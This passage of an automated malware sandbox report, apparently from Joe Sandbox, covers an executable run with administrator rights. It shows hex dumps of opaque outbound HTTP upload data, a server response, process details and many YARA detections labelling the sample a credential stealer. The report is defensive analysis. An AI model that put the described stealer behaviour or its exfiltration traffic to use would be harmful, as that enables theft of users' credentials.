                                                  2024-10-30 01:27:09 UTC15331OUTData Raw: ba 8a 6a dc a7 b4 3a dd da 17 09 18 9f 44 15 5a 15 69 7c 47 2b 89 c3 67 40 81 10 4e 0b 0d 77 fe 72 ee 7a 02 31 3d f1 14 fb 36 30 5c ef 22 79 13 e0 05 c9 6d f5 0c 77 21 9b fe 50 75 67 5a d6 5b d1 32 b4 26 2e 55 92 c1 1c 7a 37 a8 f4 92 ab 1b 4b 59 bf a7 64 9d ff 0d 77 5c 3b b3 c1 47 05 74 3c 66 04 be 51 a9 51 16 0f db b0 72 e6 cf f7 db 34 6e 16 74 a1 29 47 42 1a e7 8a 76 b8 f4 0d 7c 41 13 30 52 c5 a0 2d dc c8 2c 04 29 b7 16 4c ee 35 b2 15 44 b6 0b 02 a1 fc 49 7c c2 2f 31 07 77 fc 39 d0 b4 4a a7 2f 5e 2d e2 97 89 5e f4 c8 78 38 64 27 71 68 2c f3 64 66 46 29 d4 2e 90 0c ae fc 3e e5 b5 78 5d c0 dc cd 88 26 b4 be 6f f5 b4 5a 72 95 6b 28 cc f0 96 45 ad 88 f1 4e 74 bb 5f 17 e1 12 36 fd 15 c6 ff 92 e0 5f 5d 4a a2 27 68 80 49 f0 dc 34 11 31 e4 f0 5e 31 e9 39 4a 2c
                                                  Data Ascii: j:DZi|G+g@Nwrz1=60\"ymw!PugZ[2&.Uz7KYdw\;Gt<fQQr4nt)GBv|A0R-,)L5DI|/1w9J/^-^x8d'qh,dfF).>x]&oZrk(ENt_6_]J'hI41^19J,
                                                  2024-10-30 01:27:09 UTC15331OUTData Raw: 92 12 f3 8c 55 f8 7b 11 06 b7 fe fa 4d 75 ea 3c f2 98 54 f0 8e f5 e7 d3 18 ca cb 64 72 6a f1 6f ae 81 49 b3 df 2d d5 01 e9 6b 7c f5 9b ca b4 83 38 76 31 21 92 19 4f 4d 38 69 2f 28 26 de f9 71 56 4c 7e 38 00 1b 49 5c 5d fd 40 90 97 c6 77 ee 20 f5 9d b6 39 af d5 95 80 fc ea 86 1b c2 54 15 73 c4 1c a2 ee 6a 2d 5c 1a 33 c2 cc 28 71 53 0a ae bb ef 26 47 06 d1 37 c5 56 d4 c7 5e 1f ac be b3 da f3 b6 5b 95 53 23 9c 1c cc 99 a5 77 ac 38 3c 0a 26 a1 7e 3e 66 78 0b 5e 7e b3 de 1f 64 f7 4b 9f 67 f8 70 9a e2 9b 46 48 2c 38 7e 47 96 df 18 97 ff de f0 a6 fd d4 c1 8a 5f e7 67 c7 52 3c 7c b5 fb bd 1f 6c fc ca e7 d5 f5 53 16 a1 77 2e 9f de 3e 82 58 71 ef 06 27 f3 92 43 e3 f4 3d 7e 46 cd 8e 3e b0 12 61 cd 99 67 3b b0 aa bc 9e ee a9 ed f2 df eb d3 bf e7 a8 dd 86 a7 6d e5 20
                                                  Data Ascii: U{Mu<TdrjoI-k|8v1!OM8i/(&qVL~8I\]@w 9Tsj-\3(qS&G7V^[S#w8<&~>fx^~dKgpFH,8~G_gR<|lSw.>Xq'C=~F>ag;m
                                                  2024-10-30 01:27:09 UTC15331OUTData Raw: 39 71 58 67 ce ef f0 af f9 af 1d fc 12 01 d5 61 af 1e 55 ae da 71 ef 7d 39 dd e7 97 e0 51 b3 54 b3 b7 e2 eb 27 d7 e5 5d bc 83 d2 8f ce 82 b2 38 81 53 a2 cf c3 d3 2c 42 ad 7f 8b 05 cd 33 01 f3 8c 5b 41 71 cd 87 0f 1a fb a4 92 ef 0e 9e 22 61 1f 04 fb de 60 1b e8 16 cd 89 71 bf a6 77 be ce eb e4 ce 14 32 4e 0f 75 18 1c f6 f9 54 20 e9 df 92 51 2f f4 ad ac 56 01 a7 86 91 bd 13 92 b7 6f f6 39 69 97 48 f5 f4 f2 10 63 b8 a3 42 43 db 6e ab ed 4e 54 e0 9b 41 71 f4 1e 04 f8 60 5b 25 7f 75 c8 e9 6e 43 c5 4d d7 bc 12 90 57 e3 da 7b 70 e6 65 6f 47 00 27 b0 55 fb b5 58 e7 09 a5 79 0c 2b 73 50 e9 33 6d 5a 36 ec 03 67 7b ea 79 86 6a 11 27 44 e3 c6 f6 f4 b6 9f 63 70 b8 3d a9 42 20 e7 eb 96 cc c5 78 6e 72 4e ad 5e c4 b3 94 62 ee d3 81 b1 2e 2e eb 9b 43 03 c9 b6 f6 fb a1 5f
                                                  Data Ascii: 9qXgaUq}9QT']8S,B3[Aq"a`qw2NuT Q/Vo9iHcBCnNTAq`[%unCMW{peoG'UXy+sP3mZ6g{yj'Dcp=B xnrN^b..C_
                                                  2024-10-30 01:27:09 UTC15331OUTData Raw: cd ac 65 c3 63 31 5e 09 d6 ea 28 b6 31 b0 56 70 ba b1 96 96 b2 ec 92 51 ed 3b e6 64 73 ca ee 62 c8 85 f4 47 e2 79 fc df 90 45 34 eb ee 45 fe 27 f7 22 14 3f 8b 2d 5c 38 46 91 24 5c 8d b0 eb 5e 59 f7 f2 d0 68 9f b3 28 35 b3 4d 6b 03 9f e5 06 bf ff 10 8c d1 80 34 0d f5 77 e2 6b 8f 14 b3 c5 e6 85 86 e0 8b 4e 69 70 e3 b1 f4 89 f3 60 82 b3 8d 6f 7a 00 db e6 ed 56 e7 aa 94 ce 7c 33 aa 53 fa be 30 5c ff fd 7f 8b d5 9d 11 c8 aa 43 d6 8a b5 46 49 cc fe 45 41 d0 54 8e ba 0a 00 0c 8b fe df 25 bf 1b e4 8b da ee 54 92 58 a0 82 5a f1 50 8d 03 e3 df b6 a7 af ca c1 dc df 77 4e 5e 81 78 76 94 03 c7 a9 ea ed ee 24 9a 5b 2b dd 00 96 44 80 18 9a 86 a6 7d 29 96 01 c2 6b 8b bf eb 49 ad d0 d1 47 03 d6 33 c7 8e b2 12 7e 6c 86 6a 19 b7 fa 1d c5 b8 41 97 6f 60 d2 df 9f 03 e6 b8 2c
                                                  Data Ascii: ec1^(1VpQ;dsbGyE4E'"?-\8F$\^Yh(5Mk4wkNip`ozV|3S0\CFIEAT%TXZPwN^xv$[+D})kIG3~ljAo`,
                                                  2024-10-30 01:27:09 UTC15331OUTData Raw: 7f 9d 06 3b 9c fa 38 d2 94 44 3a 10 e1 27 fe 53 b9 ea 7b 83 e0 05 10 e9 36 c3 f5 e2 a6 a6 c6 21 be 3e c4 09 14 a5 61 e3 27 31 98 a2 95 14 3b 37 e8 67 f8 17 5c 4f 10 a9 c5 89 6a 15 e3 53 0c ab 8b 2e be fd b8 a0 b8 80 57 7d 26 d1 e2 16 ff 4b 51 95 50 92 62 ef 12 ed c7 7d fb 52 56 22 ef f2 30 7d 41 29 6b 2c cd 24 fd 57 5e 12 69 fe ec c8 32 e9 7a 8f ab 3c e0 83 2c 66 0e 75 f5 90 d5 96 19 c6 b9 b4 0a 49 cb 0b 91 73 1f 4d 9b c2 cb 8d 3e b5 49 68 6b 26 95 b8 c2 c6 d8 60 3f f0 0e 9b ea 76 0a 93 63 6b 52 81 bf a9 8f 5f 3b 74 38 fa aa 6a ea 08 d1 66 7c 96 34 63 f0 49 aa 29 e8 6d 81 d7 c1 21 99 7f 5e 91 0d b6 09 82 b1 65 98 bd c5 c6 4e 43 31 aa 00 d2 1c 0f c6 ba 05 0c cb 8f 3a bb b7 a1 cc 69 d5 f6 bc 9a 4a 75 f1 3c a5 87 53 67 e2 37 ff 0e d5 d3 6e 47 9a b2 bf 30 4a
                                                  Data Ascii: ;8D:'S{6!>a'1;7g\OjS.W}&KQPb}RV"0}A)k,$W^i2z<,fuIsM>Ihk&`?vckR_;t8jf|4cI)m!^eNC1:iJu<Sg7nG0J
                                                  2024-10-30 01:27:09 UTC15331OUTData Raw: 00 38 91 e5 aa cb b0 83 18 bd d6 72 60 5e b0 a1 ee 12 20 fd eb 41 75 6f ac 40 5f 1d 8a a8 d1 df 7e e7 f8 08 8a 38 79 8b f6 74 5b 64 28 bc c3 45 45 4b f0 d5 7c 9d c5 5d b4 77 4f fd de ea 84 02 5f a8 89 63 78 63 be 9e 0b 9c 21 1c f4 a6 f2 48 4a 26 90 09 48 61 f1 fe eb d4 5e 03 79 fe 76 53 d1 c4 56 c3 94 0a de 05 5f 12 55 bc 91 36 dd ba 91 39 37 f7 41 5a ad 31 a2 00 17 31 04 68 e2 48 a0 cc 05 3b 63 be cd fb bf db dd 04 7a 09 d0 fe 66 9c b0 42 03 bd 57 80 ba d6 86 24 87 c7 41 df 41 28 58 39 26 40 a3 22 58 ae 0e 50 f1 a8 77 98 4f e9 1f ae 38 dc 16 27 a4 d8 13 b0 7b 0e 83 71 5f 14 9f 4c ef 9e 8e 5e 5b 5e aa ef 36 f7 86 ef 5b da bf 37 70 e7 84 d8 31 7b 1a a6 59 a5 9a 9a 1a 28 d9 7b 28 91 fe 5f 11 b4 0e d5 dd e3 f1 4a 34 96 80 6c 44 11 d8 5b bb 7b aa 48 ab 94 53
                                                  Data Ascii: 8r`^ Auo@_~8yt[d(EEK|]wO_cxc!HJ&Ha^yvSV_U697AZ11hH;czfBW$AA(X9&@"XPwO8'{q_L^[^6[7p1{Y({(_J4lD[{HS
                                                  2024-10-30 01:27:09 UTC15331OUTData Raw: e2 f3 9f fd b2 6b 59 e7 f5 d9 ad 0b 1f 7b 16 be 19 82 cd f5 01 e6 ef e0 e4 da f8 95 f6 09 1d 45 0c f0 22 db 2a 0a 74 0e f2 fe 67 b9 ff 20 29 1b 26 72 93 5f 7f fd f0 fc f4 84 6b 52 a7 e4 58 bb 92 93 0d 80 14 6e 44 08 28 9f e8 1a bb 30 30 e0 30 34 b3 62 0c cb 40 50 ae 64 39 94 c2 b5 17 3f 9d 26 55 ed 04 d4 eb 36 c7 d4 4b 64 af de 39 b6 4e 21 dd 84 a8 c9 d9 44 01 1e 27 12 c7 e4 77 68 cd 09 ad 38 3d fc 28 3c b4 5b 2c e1 47 7d 86 12 7a 1d 4b 75 0f 41 51 7e 7d 0e 2c 92 24 12 e3 04 4b e6 84 a8 0e 46 67 22 7a bd f7 7e 59 0d da ab 94 96 94 69 35 73 58 ee de fb 54 35 4c bf 06 28 24 b0 9c ba 79 36 c5 ee 40 64 f2 5e 30 7b f6 32 d0 3f 54 06 0f 51 46 52 d6 5c 1f ec 02 bc e5 a7 0e 7f 4d a1 ac 0a a4 61 7b 24 37 76 31 1c 90 40 56 02 53 22 0f 66 5f a8 bc 78 34 f8 43 98 67
                                                  Data Ascii: kY{E"*tg )&r_kRXnD(0004b@Pd9?&U6Kd9N!D'wh8=(<[,G}zKuAQ~},$KFg"z~Yi5sXT5L($y6@d^0{2?TQFR\Ma{$7v1@VS"f_x4Cg
                                                  2024-10-30 01:27:09 UTC15331OUTData Raw: 4c 62 bf 17 93 0e 0b c1 e9 23 4d 00 a2 23 66 67 6a b6 a8 66 ad 2b 6b 1d c1 68 88 88 c6 35 c5 84 3e 8b 98 d6 db 0b 8e 4d e9 51 16 f8 36 ce 53 4c ef f6 55 88 c6 2d ef 16 f0 a1 67 95 c3 f3 fe 08 dd cc fc 51 7b 3e 96 62 7f fa d5 19 80 3f b2 3c b8 19 f1 fa a6 48 91 ff 33 c5 a3 fd f1 eb b4 11 d2 a6 fb 48 9b f8 9e 5f 36 d5 f6 0b eb db 11 76 4a 05 cc 22 60 ff 17 d1 96 23 29 99 16 d4 77 70 ca 4e 51 6e d0 f5 6d 08 aa 50 5a 29 bb 14 c2 18 96 7c 92 d6 2e 74 e9 0e 1a 81 6d 39 74 1f 20 ee dd 76 17 e8 4b d7 6a b9 b8 f3 83 6c 1f 40 42 90 c5 2f a9 f9 9a 32 7a 55 e4 c0 d6 15 b4 17 75 3b 76 09 a0 64 a4 b5 76 fb 29 2a 70 b6 ff a3 0e 44 55 c3 b4 e8 52 6b 67 bd 8f b6 7e 44 f2 2c 66 39 0d 84 0f 0a e8 f2 80 14 80 6f 29 6d 09 22 31 53 51 8a 54 c5 17 6d 38 24 45 e6 2f b2 a5 41 ac
                                                  Data Ascii: Lb#M#fgjf+kh5>MQ6SLU-gQ{>b?<H3H_6vJ"`#)wpNQnmPZ)|.tm9t vKjl@B/2zUu;vdv)*pDURkg~D,f9o)m"1SQTm8$E/A
                                                  2024-10-30 01:27:09 UTC15331OUTData Raw: 1a 99 87 4a 6c 2a ce 98 31 93 05 dd de 9b a1 e0 92 44 09 4a ea bf 86 45 01 d1 90 09 15 e3 69 81 4b 28 71 35 63 5f 28 da c1 73 b0 5b a1 fb d5 74 22 63 81 af 45 70 45 b1 a3 dd 1f bf e1 e8 9f 31 c7 3f af de 1b ca b3 4e 00 d4 ea 90 f9 bd ba 28 df 81 82 9f 73 46 08 a2 2f d7 f5 cd 82 78 9e 1d 53 10 73 01 5b 62 91 2d bb 7d 7f 1c cb b8 ce d5 d4 3e 84 3b 12 c2 bd 14 d0 ac 94 ff 24 e6 6a 44 81 68 52 0e 6f 92 07 cf dc e7 91 08 0b 55 b1 b7 ca 7c 6d 3a 1a c7 cc ae a7 7f 55 74 5c cc 3c 4c 88 85 3c f6 62 79 0f 17 60 c8 1a b9 5b 64 2b 5f 93 e8 2a ed 53 aa 2e b7 53 bd ad 58 df 4b 73 d9 62 fe 9d 2b a3 01 73 98 3c 0a f5 03 33 bb b6 cf d1 f8 a9 eb fa 53 0b 26 53 36 ad 9c cd f6 9d cb bc d6 bc c5 8a d0 c5 46 ee a0 47 c9 0b 30 1f 62 3d 5a 28 2a 89 bc c6 5b fe 73 48 36 d3 96 a5
                                                  Data Ascii: Jl*1DJEiK(q5c_(s[t"cEpE1?N(sF/xSs[b-}>;$jDhRoU|m:Ut\<L<by`[d+_*S.SXKsb+s<3S&S6FG0b=Z(*[sH6
                                                  2024-10-30 01:27:11 UTC1015INHTTP/1.1 200 OK
                                                  Date: Wed, 30 Oct 2024 01:27:11 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: PHPSESSID=2ra4cg3mpn7qh8beac0lq2ipkv; expires=Sat, 22 Feb 2025 19:13:49 GMT; Max-Age=9999999; path=/
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  cf-cache-status: DYNAMIC
                                                  vary: accept-encoding
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cRS9LwPFwzCyICb7vdJ85wVpGk2aekoC8ByNsmnAPktddxklVQLFRwJFMSae8dur1R7RNrhUXCHJ5LqQjzmRSCnUiAn1yKuTPRqZ3ExlMFt1GwNYeju6eaEobmislCfMTgme7yg%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8da79f0adf32a924-DFW
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1391&sent=226&recv=608&lost=0&retrans=0&sent_bytes=2845&recv_bytes=573137&delivery_rate=1929380&cwnd=201&unsent_bytes=0&cid=8f6634fbc70e8c99&ts=1954&x=0"


                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:21:26:55
                                                  Start date:29/10/2024
                                                  Path:C:\Users\user\Desktop\file.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                                  Imagebase:0x910000
                                                  File size:3'001'344 bytes
                                                  MD5 hash:00E4FAF579951DEDCFE07699F0816EA9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2104689595.00000000011B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2123719627.00000000011B4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2106741517.00000000011B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2120737327.000000000119B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2076312440.0000000001199000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2075895633.0000000001197000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2123446678.00000000011B3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2120936857.00000000011B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2089453948.00000000011A7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2090525547.00000000011B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2120905193.000000000119B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2077335207.0000000001199000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:true

                                                  Disassembly

                                                  Reset < >

                                                    Non-executed Functions

                                                    Function 011AFF9C Relevance: 2.4, Instructions: 2410COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000003.2120737327.000000000119B000.00000004.00000020.00020000.00000000.sdmp, Offset: 0119B000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_3_119b000_file.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 47246d5e6c1323b53e9b68885da2c9e87a57509879e31b9f266c4e8eb2150fa9
                                                    • Instruction ID: 60c37a10912743e959702791212a7b3debf22d27e0ffff3f6e78454932985009
                                                    • Opcode Fuzzy Hash: 47246d5e6c1323b53e9b68885da2c9e87a57509879e31b9f266c4e8eb2150fa9
                                                    • Instruction Fuzzy Hash: AC23D6315563A1DFCB96CF78D8D5AC17BB0EF27B2431919DDC4808E12AD339A809DB62